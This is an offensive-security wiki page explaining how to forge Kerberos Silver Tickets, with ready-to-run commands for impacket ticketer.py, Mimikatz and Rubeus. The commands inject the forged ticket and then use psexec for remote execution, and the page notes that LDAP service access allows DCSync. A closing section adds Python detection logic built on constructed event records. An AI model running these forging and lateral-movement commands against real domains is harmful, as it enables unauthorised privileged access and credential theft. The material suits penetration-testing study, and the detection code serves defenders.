# Silver Tickets

A Silver Ticket is a forged Kerberos service ticket that grants access, as any chosen domain user, to a service on a specific computer.

An attacker forges the ticket for an arbitrary domain account and a target SPN, embedding a forged Privilege Attribute Certificate (PAC) that claims the account has full privileges on that service. The ticket is presented directly to the service, so the domain controller is never involved in issuing it.

{% hint style="info" %}
The password (or the NT hash / AES key derived from it) of the target service's computer account is required to create a Silver Ticket, since the Service Ticket, and the PAC inside it, are encrypted with that key.
{% endhint %}

## Exploit

{% tabs %}
{% tab title="impacket-ticketer" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```bash
## Create a Silver Ticket using the NT hash of the target computer account and the target SPN
## (the trailing argument is the user name to forge; ticketer.py writes <username>.ccache)
ticketer.py -nthash [nt hash] -domain-sid [domain sid] -domain [domain] -spn cifs/computer.weelee.zip weelee

## Point the Kerberos credential cache at the obtained .ccache
export KRB5CCNAME=[path to .ccache]

## Use your exec tool of choice to access the specific service (the host must match the SPN)
psexec.py [domain]/[username]@[computer] -k -no-pass
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% embed url="https://github.com/gentilkiwi/mimikatz" %}

{% code title="Windows (Target)" %}

```powershell
## Run Mimikatz.exe
Mimikatz.exe

## Create Silver Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[nt hash] /service:cifs /target:computer.weelee.zip /user:weelee /ptt

## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the key you hold is an AES128 or AES256 key rather than an NT hash.
{% endhint %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="https://github.com/GhostPack/Rubeus" %}

{% embed url="https://github.com/S3cur3Th1sSh1t/SharpImpersonation" %}

{% hint style="info" %}
If you want to create a Silver Ticket with access to more than one service, you can add the `/altservice:` flag in your Rubeus command with any additional services.

<mark style="color:red;">**Example:**</mark> `/altservice:cifs,ldap,host,krbtgt,winrm`
{% endhint %}

{% code title="Windows (Target)" %}

```powershell
## Create a Silver Ticket and inject it into the current process
Rubeus.exe silver /service:cifs/computer.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap /ptt

## Use your exec tool of choice to access the specific service
PSexec.exe -accepteula \\computer.weelee.zip cmd

## --- OR: create the ticket first, then use it from a dedicated process ---

## Create a Silver Ticket (base64 ticket is printed to the console)
Rubeus.exe silver /service:cifs/dc.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap

## Create a new process and inject the Silver Ticket into it (user/pass can be anything)
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:anypassword /ticket:[previous command output]

## Use a tool to impersonate the process created above
Invoke-SharpImpersonation -Command "pid:[pid]"
```

{% endcode %}

{% hint style="info" %}
The `/rc4` flag can be replaced with `/aes128` or `/aes256` if the key you hold is an AES128 or AES256 key rather than an NT hash.
{% endhint %}
{% endtab %}
{% endtabs %}

{% hint style="info" %}
<mark style="color:yellow;">**CIFS**</mark> Allows you to access the *C$* and *ADMIN$* administrative shares via SMB

<mark style="color:yellow;">**LDAP**</mark> Allows you to [DCSync](https://stuff.weelee.zip/network/on-prem-active-directory/credential-hunting/ntds.dit/dcsync)

<mark style="color:yellow;">**HOST**</mark> Allows you to create scheduled tasks on the computer
{% endhint %}
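Because a Silver Ticket is minted offline with the service key, no domain controller ever issues it: the target host logs a Kerberos network logon (Event ID 4624, logon type 3) for which no DC has a matching TGS request (Event ID 4769). The following detection logic is an added example written for this page, not code from any of the tools above; the event records are constructed, simplified dictionaries rather than real EVTX output, and the field names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769 (TGS requested) records collected from every DC.
DC_4769 = [
    {"time": "2024-05-01T10:00:00", "account": "alice@WEELEE.ZIP",
     "service": "cifs/computer.weelee.zip", "client_ip": "10.0.0.5"},
    {"time": "2024-05-01T10:02:00", "account": "bob@WEELEE.ZIP",
     "service": "host/computer.weelee.zip", "client_ip": "10.0.0.6"},
]

# Constructed sample of Event ID 4624 (logon) records from the member server computer.weelee.zip.
HOST_4624 = [
    {"time": "2024-05-01T10:00:05", "account": "alice", "domain": "WEELEE",
     "logon_type": 3, "package": "Kerberos", "source_ip": "10.0.0.5"},
    {"time": "2024-05-01T10:07:00", "account": "weelee", "domain": "weelee.zip",
     "logon_type": 3, "package": "Kerberos", "source_ip": "10.0.0.9"},
    {"time": "2024-05-01T10:09:00", "account": "carol", "domain": "WEELEE",
     "logon_type": 3, "package": "NTLM", "source_ip": "10.0.0.7"},
]

# Default maximum service ticket lifetime in AD is 600 minutes, so a legitimate
# 4624 can trail the 4769 that issued its ticket by up to that long.
MAX_TICKET_LIFETIME = timedelta(minutes=600)

def unissued_kerberos_logons(host_events, dc_events, window=MAX_TICKET_LIFETIME):
    """Kerberos network logons (type 3) whose account received no TGS from any DC
    within `window` before the logon. Requires 4769 events from *all* DCs, otherwise
    legitimate logons serviced by an uncollected DC will be flagged too."""
    hits = []
    for ev in host_events:
        if ev["logon_type"] != 3 or ev["package"] != "Kerberos":
            continue
        t = datetime.fromisoformat(ev["time"])
        user = ev["account"].lower()
        issued = any(
            e["account"].split("@")[0].lower() == user
            and t - window <= datetime.fromisoformat(e["time"]) <= t
            for e in dc_events
        )
        if not issued:
            hits.append(ev)
    return hits

def fqdn_domain_field(host_events):
    """Logons whose 4624 Account Domain is a DNS name (e.g. weelee.zip) instead of the
    NetBIOS name (WEELEE). Forged tickets commonly carry the realm exactly as typed on
    the command line, which DC-issued logons do not; treat this as a weaker signal."""
    return [ev for ev in host_events if "." in ev["domain"]]
```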
